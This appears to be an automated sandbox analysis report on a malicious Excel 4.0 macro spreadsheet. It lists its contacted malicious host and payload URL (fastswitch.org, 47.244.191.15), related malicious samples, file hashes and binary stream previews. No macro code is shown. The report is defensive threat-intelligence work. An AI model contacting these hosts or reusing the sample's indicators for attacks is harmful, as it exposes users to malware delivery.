                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorizeA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      47.244.191.15
                                                                                                                                                      fastswitch.orgUnited States
                                                                                                                                                      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                      Analysis ID:384830
                                                                                                                                                      Start date:09.04.2021
                                                                                                                                                      Start time:22:14:39
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 46s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:document-1429954472.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:24
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal72.expl.evad.winXLS@3/6@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.54.113.53, 40.88.32.150, 52.109.88.177, 52.109.76.34, 52.109.12.24, 13.64.90.137, 95.100.54.203, 20.82.210.154, 23.10.249.26, 23.10.249.43, 8.252.5.126, 8.241.83.126, 8.238.29.126, 8.238.85.254, 8.241.89.254, 51.103.5.159, 20.50.102.62, 20.54.26.129
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/384830/sample/document-1429954472.xls

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      47.244.191.15document-1429954472.xlsGet hashmaliciousBrowse
                                                                                                                                                      • fastswitch.org/ds/0702.gif

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocument-1429954472.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 47.244.191.15
                                                                                                                                                      documents-351331057.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      documents-351331057.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      BvuKqSpgIG.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.11.132.10
                                                                                                                                                      3vQD6TIYA1.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.209.67.151
                                                                                                                                                      wininit.dllGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.88.90
                                                                                                                                                      XN123gfQJQ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.209.67.151
                                                                                                                                                      0408_391585988029.docGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.88.90
                                                                                                                                                      msals.pumpl.dllGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.88.90
                                                                                                                                                      BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.95.18
                                                                                                                                                      BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.95.18
                                                                                                                                                      WDnE51mua6.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.95.18
                                                                                                                                                      documents-2112491607.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      0406_37400496097832.docGet hashmaliciousBrowse
                                                                                                                                                      • 8.208.95.92
                                                                                                                                                      32_64_ver_2_bit.exeGet hashmaliciousBrowse
                                                                                                                                                      • 8.209.67.151
                                                                                                                                                      1234.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209
                                                                                                                                                      12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 8.211.4.209

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A22CCA86-2F39-4600-BB5A-EA92F07BD5C2
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):133926
                                                                                                                                                      Entropy (8bit):5.370354121975831
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:GcQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:FVQ9DQW+zYXO8
                                                                                                                                                      MD5:715FAA68535E89870493810B5D2FFDF1
                                                                                                                                                      SHA1:8B887AEB4B6287D172AD0991CDAC56366F4FDE0B
                                                                                                                                                      SHA-256:9EF9459DC9C0A3E55792F8E99112FC88AFF72F8A4F1B08725A871C858E496D5F
                                                                                                                                                      SHA-512:7B90800E925A1E7BB4F432FC143EFC785BD01BBCD1B06B24119EC82A23A50C1CA9CAC2C33D3A817C7891D8015AE7D09FB23EE9E6F8E531667148C3047B8EB6DB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-09T20:15:37">.. Build: 16.0.14008.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4B910000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):304154
                                                                                                                                                      Entropy (8bit):7.9883709648263235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:Y8/4krFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MF:ttFPM8R3AsB+bjej/9cC
                                                                                                                                                      MD5:248BADE7956AD1E277A44DE44259DE44
                                                                                                                                                      SHA1:D32306A7ECD7B57DB9FDE9D74B28F63DA41F4E9E
                                                                                                                                                      SHA-256:298D96EC2615DE4B5507735CC6D5EED11C8BA20CA2AA3AEA5B47406DC159E676
                                                                                                                                                      SHA-512:23DD1E477168131989B69D00EDF7135F930856A2D83D0BA1F41422D10604D99FD948F02BAB3833A452EE09B160633AE8962D7E763E56714648EBD008F0BE2EB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .T.n.0....?..........C....I?`L.%...a...;.......s.B.-..........{q..D.^.m.._......^...{.E........0.S/...)I......*$.._. #.5.(?.f...>..m..b1..+x.........x.|.}W.z.1Z. .Q.....6.VF....1uG1!h....]L........G5..^h.W<.......cd-.F......B.y=.=.'.`2..[H..8NKn.|.i..a.&)a:jq..v5..J...."....O(U$.z.........W*...>..s..j...........+.4......C.N)..P.en......=.C'x*.......D.ty.....V.......n#.a....~....<..>n,.T.>.-..^........PK..........!.I$ON............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Apr 10 04:15:39 2021, atime=Sat Apr 10 04:15:39 2021, length=12288, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.637845996587645
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8dMXUklhgcuElPCH2YgJthfYWuCrmZ8+WrjAZ/2bDqyLC5Lu4t2Y+xIBjKZm:8s0gJthhLmZeAZiDqb87aB6m
                                                                                                                                                      MD5:CDD8A1C0C624C1D6DA5746B8E8657B01
                                                                                                                                                      SHA1:7DE97CBDA41610597FE5CF1EE1F89B92361F1915
                                                                                                                                                      SHA-256:A7D7F75512E90FF649968C8E8CA8DEEA6570F9D3BC1A333415AE90C05C2A7497
                                                                                                                                                      SHA-512:B483A592C5495E74EA727ECF9CC13B9442EA17785AF461453588EA018FF5742910770C73EE3F061437018B13DE8FCAE107CEAA41BEB1BDD88FDF74C4FAE734E2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-..<M...-.......-...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.)....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..R.).....S.....................W..h.a.r.d.z.....~.1......R.)..Desktop.h.......Ny..R.).....Y..............>......7.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......301389...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1429954472.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Sat Apr 10 04:15:39 2021, atime=Sat Apr 10 04:15:39 2021, length=323072, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4400
                                                                                                                                                      Entropy (8bit):4.6892889559855995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8tDPs0moM/fYjRsMflPCWDB6ptDPs0moM/fYjRsMflPCWDB6pBPs0moM/fYjRsMn:87jacK7jacKHjacKHjac
                                                                                                                                                      MD5:D59276AEB4B7EC4537C8BCD051C6FC6D
                                                                                                                                                      SHA1:20CFEC5D0582DE72095E38D5C82130F513CAF59D
                                                                                                                                                      SHA-256:C66188DB3503350E6BC2A6D04426AFF8F4A73B366036324DD8E680F5233804A9
                                                                                                                                                      SHA-512:48EA85A128520D380D9F999CB513EF548217BD0FCC4835288C98F1B6CC22219351483808C50F8563DBE42CFC8C6A1089AB283BFAB1382E5BA8FE314C1810258C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...J...:........-.......-...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.)....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..R.).....S.....................W..h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R.).....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......R.) .DOCUME~1.XLS..`......>Qwx.R.)....h......................Q<.d.o.c.u.m.e.n.t.-.1.4.2.9.9.5.4.4.7.2...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1429954472.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.2.9.9.5.4.4.7.2...x.l.s.........:..,.LB.)...As...`.......X.......301389...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):260
                                                                                                                                                      Entropy (8bit):4.762839088583431
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:dj6Y9LDfFELDf/Y9LDfFELDf/Y9LDfFELDf/Y9LDf7:dmGfaf/Gfaf/Gfaf/Gf7
                                                                                                                                                      MD5:58E3827B504FBF1E51B41CE01CDAF930
                                                                                                                                                      SHA1:BB60841F0ED6DC8B889750D1C684DA3F6BBAF0D1
                                                                                                                                                      SHA-256:D9F09E15034AC8077D0511628DC5F3888983AD25F172FC03C56B7582D97B485D
                                                                                                                                                      SHA-512:310A40D63ED663501F5952FC4230F32F99DA1C7BB3E0A16474A4BAFBD10BAF73142C3C2696BACB14109419908C0F585BC6CA734777D0DCFF67FABC49C7B68263
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..document-1429954472.xls.LNK=0..document-1429954472.xls.LNK=0..[xls]..document-1429954472.xls.LNK=0..document-1429954472.xls.LNK=0..[xls]..document-1429954472.xls.LNK=0..document-1429954472.xls.LNK=0..[xls]..document-1429954472.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\5C910000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):359808
                                                                                                                                                      Entropy (8bit):7.417415957781496
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:RcKoSsxzNDZLDZjlbR868O8KL5L+od2xEtjPOtioVjDGUU1qfDlavx+W2QnAFVA7:4eLUIRfUI5uXL6nDJoEhch
                                                                                                                                                      MD5:F51C47EF0ADD3616578E52564D526B96
                                                                                                                                                      SHA1:0008DA0D37F4CD7479BE78A951C7A5A65D2BFA89
                                                                                                                                                      SHA-256:F145C5282F5B79208E71925C09D218DFC6FDF05387C94C22DEB4D2CC298BF4B0
                                                                                                                                                      SHA-512:A91A8F535457AE6B780806344F3D2EDBF7FB9C5AADD423736E4664C1154FE4EFCF2BDC3B18CD320F1E5DB70E87E4023C4BC387D136B4DE03A2E90026620CD3E4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p.... B.....a.........=...........................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......>..........C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......<..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...............

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 8 08:28:15 2021, Security: 0
                                                                                                                                                      Entropy (8bit):7.606041071167239
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:document-1429954472.xls
                                                                                                                                                      File size:323072
                                                                                                                                                      MD5:de9de1ff91dd0501f1405ce027fb5941
                                                                                                                                                      SHA1:826804c571db7b1c892160c8c4c05c2d5d015d63
                                                                                                                                                      SHA256:26acece82b024fc2b5306a52189db24a8742c11cc9ebbc84ab6a5dca8672bc0c
                                                                                                                                                      SHA512:39613ef3a2854ec0125fa3f5a50ad8b320f0e63a0b0cdfc5b60fb0a4ec6b5efbd2d74044570616c78229e215d29bb9bb1feb4d589b9c56bff2be88eeb8d408ec
                                                                                                                                                      SSDEEP:6144:BcKoSsxzNDZLDZjlbR868O8KlVH33dq7uDphYHceXVhca+fMHLty/xcl8OR4PiAO:EeLUIRfUI5uXL6nDJoc5
                                                                                                                                                      File Content Preview:........................>.......................u...........................p...q...r...s...t..................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "document-1429954472.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-02-08 08:28:15
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:917504

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.311136915093
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 96 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.251468853718
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . W X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 311013
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:311013
                                                                                                                                                      Entropy:7.7372453803
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

